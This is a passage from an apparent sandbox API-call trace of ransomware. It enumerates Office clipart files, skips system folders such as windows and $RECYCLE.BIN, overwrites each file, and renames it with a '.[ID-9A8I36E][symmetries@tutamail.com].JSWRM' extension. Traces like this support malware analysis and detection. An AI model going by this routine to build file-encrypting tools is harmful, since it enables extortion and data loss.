1 [0088.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0088.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216570.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216570.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216570.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0088.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216570.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.058] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24796) returned 1 [0088.058] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60d0) returned 0x24d210 [0088.059] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x60d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x60d0, lpOverlapped=0x0) returned 1 [0088.062] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.062] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x60d0, lpOverlapped=0x0) returned 1 [0088.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.062] CloseHandle (hObject=0x314) returned 1 [0088.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0088.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0088.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0088.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0088.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0088.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.062] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216570.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216570.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0088.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.063] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.063] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec9380a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f46, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0216600.WMF", cAlternateFileName="")) returned 1 [0088.063] lstrcmpiW (lpString1="J0216600.WMF", lpString2=".") returned 1 [0088.063] lstrcmpiW (lpString1="J0216600.WMF", lpString2="..") returned 1 [0088.063] lstrcmpiW (lpString1="J0216600.WMF", lpString2="...") returned 1 [0088.063] lstrcmpiW (lpString1="J0216600.WMF", lpString2="windows") returned -1 [0088.063] lstrcmpiW (lpString1="J0216600.WMF", lpString2="recovery") returned -1 [0088.063] lstrcmpiW (lpString1="J0216600.WMF", lpString2="perflogs") returned -1 [0088.063] lstrcmpiW (lpString1="J0216600.WMF", lpString2="documents and settings") returned 1 [0088.063] lstrcmpiW (lpString1="J0216600.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.064] lstrcmpiW (lpString1="J0216600.WMF", lpString2="system volume information") returned -1 [0088.064] lstrcmpiW (lpString1="J0216600.WMF", lpString2="msocache") returned -1 [0088.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216600.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216600.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216600.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0088.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216600.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216600.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216600.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0088.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.064] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0088.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216600.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.064] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8006) returned 1 [0088.064] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.064] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f40) returned 0x205850 [0088.065] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f40, lpOverlapped=0x0) returned 1 [0088.066] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.066] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f40, lpOverlapped=0x0) returned 1 [0088.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.067] CloseHandle (hObject=0x314) returned 1 [0088.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0088.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0088.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0088.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0088.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0088.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.067] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216600.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216600.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0088.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0088.068] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24e2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0216612.WMF", cAlternateFileName="")) returned 1 [0088.068] lstrcmpiW (lpString1="J0216612.WMF", lpString2=".") returned 1 [0088.068] lstrcmpiW (lpString1="J0216612.WMF", lpString2="..") returned 1 [0088.068] lstrcmpiW (lpString1="J0216612.WMF", lpString2="...") returned 1 [0088.068] lstrcmpiW (lpString1="J0216612.WMF", lpString2="windows") returned -1 [0088.068] lstrcmpiW (lpString1="J0216612.WMF", lpString2="recovery") returned -1 [0088.068] lstrcmpiW (lpString1="J0216612.WMF", lpString2="perflogs") returned -1 [0088.068] lstrcmpiW (lpString1="J0216612.WMF", lpString2="documents and settings") returned 1 [0088.068] lstrcmpiW (lpString1="J0216612.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.068] lstrcmpiW (lpString1="J0216612.WMF", lpString2="system volume information") returned -1 [0088.068] lstrcmpiW (lpString1="J0216612.WMF", lpString2="msocache") returned -1 [0088.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0088.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216612.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216612.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216612.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0088.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0088.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216612.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216612.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216612.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0088.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216612.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.069] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9442) returned 1 [0088.069] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x24e0) returned 0x24d210 [0088.069] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x24e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x24e0, lpOverlapped=0x0) returned 1 [0088.071] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.071] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x24e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x24e0, lpOverlapped=0x0) returned 1 [0088.071] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.071] CloseHandle (hObject=0x314) returned 1 [0088.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0088.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0088.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0088.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0088.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0088.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.072] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216612.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216612.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0088.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.073] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b3a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0216874.WMF", cAlternateFileName="")) returned 1 [0088.073] lstrcmpiW (lpString1="J0216874.WMF", lpString2=".") returned 1 [0088.073] lstrcmpiW (lpString1="J0216874.WMF", lpString2="..") returned 1 [0088.073] lstrcmpiW (lpString1="J0216874.WMF", lpString2="...") returned 1 [0088.073] lstrcmpiW (lpString1="J0216874.WMF", lpString2="windows") returned -1 [0088.073] lstrcmpiW (lpString1="J0216874.WMF", lpString2="recovery") returned -1 [0088.073] lstrcmpiW (lpString1="J0216874.WMF", lpString2="perflogs") returned -1 [0088.073] lstrcmpiW (lpString1="J0216874.WMF", lpString2="documents and settings") returned 1 [0088.073] lstrcmpiW (lpString1="J0216874.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.073] lstrcmpiW (lpString1="J0216874.WMF", lpString2="system volume information") returned -1 [0088.073] lstrcmpiW (lpString1="J0216874.WMF", lpString2="msocache") returned -1 [0088.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216874.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216874.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216874.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216874.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0216874.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0216874.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0088.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216874.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.074] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=39738) returned 1 [0088.074] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 